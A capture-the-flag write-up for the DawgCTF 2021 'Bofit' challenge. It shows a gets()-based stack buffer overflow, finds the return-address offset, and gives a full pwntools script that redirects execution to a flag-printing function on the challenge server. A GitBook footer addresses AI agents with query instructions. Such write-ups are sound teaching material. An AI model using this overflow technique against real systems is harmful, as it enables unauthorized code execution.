> For the complete documentation index, see [llms.txt](https://ctf.zeyu2001.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ctf.zeyu2001.com/2021/dawgctf-2021/bofit.md). # Bofit ## Challenge Because Bop It is copyrighted, apparently nc umbccd.io 4100 Author: trashcanna ## Solution We want to jump here: ```c void win_game(){ char buf[100]; FILE* fptr = fopen("flag.txt", "r"); fgets(buf, 100, fptr); printf("%s", buf); } ``` Using Redare2, the address is 0x00401256. ![](/files/-M_EDbc-FAt9aY6b6_DY) ```c int play_game(){ char c; char input[20]; int choice; bool correct = true; int score = 0; srand(time(0)); while(correct){ choice = rand() % 4; switch(choice){ case 0: printf("BOF it!\n"); c = getchar(); if(c != 'B') correct = false; while((c = getchar()) != '\n' && c != EOF); break; case 1: printf("Pull it!\n"); c = getchar(); if(c != 'P') correct = false; while((c = getchar()) != '\n' && c != EOF); break; case 2: printf("Twist it!\n"); c = getchar(); if(c != 'T') correct = false; while((c = getchar()) != '\n' && c != EOF); break; case 3: printf("Shout it!\n"); gets(input); if(strlen(input) < 10) correct = false; break; } score++; } return score; } ``` In the above function, all the cases are implemented safely with `c = getchar();` except for "Shout it!", which uses `gets()`. `gets()` does not check the input length and is prone to buffer overflows. We can play the game until "Shout it!" appears and pass in the output of `msf-pattern_create -l 1000` as the input. When the game ends and the function returns, the app crashes and we can see the saved RIP value. ![](/files/-M_EDvdSjYXy8UAe421l) We know the offset is 56. ![](/files/-M_EE7LSfF3WdTcqdcen) We have the info we need to craft our payload! The only trick here is to implement some logic to "play the game" until "Shout it!" is used. After sending our payload and overwriting the RIP, we need to give a "wrong" input so that the function returns. ```python from pwn import * ret = 0x00401256 offset = 56 payload = b"" payload += b"A" * offset payload += p32(ret) print(payload) conn = remote('umbccd.io', 4100) conn.recvuntil('BOF it to start!') line = conn.recvline() while b'Shout it!' not in line: line = line.decode() conn.send(line) line = conn.recvline() conn.send(payload + b"\n") conn.recvline() conn.send(b"A" + b"\n") print(conn.recv()) conn.close() ``` ![](/files/-M_EEMgtXjK8XhjQV29h) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://ctf.zeyu2001.com/2021/dawgctf-2021/bofit.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.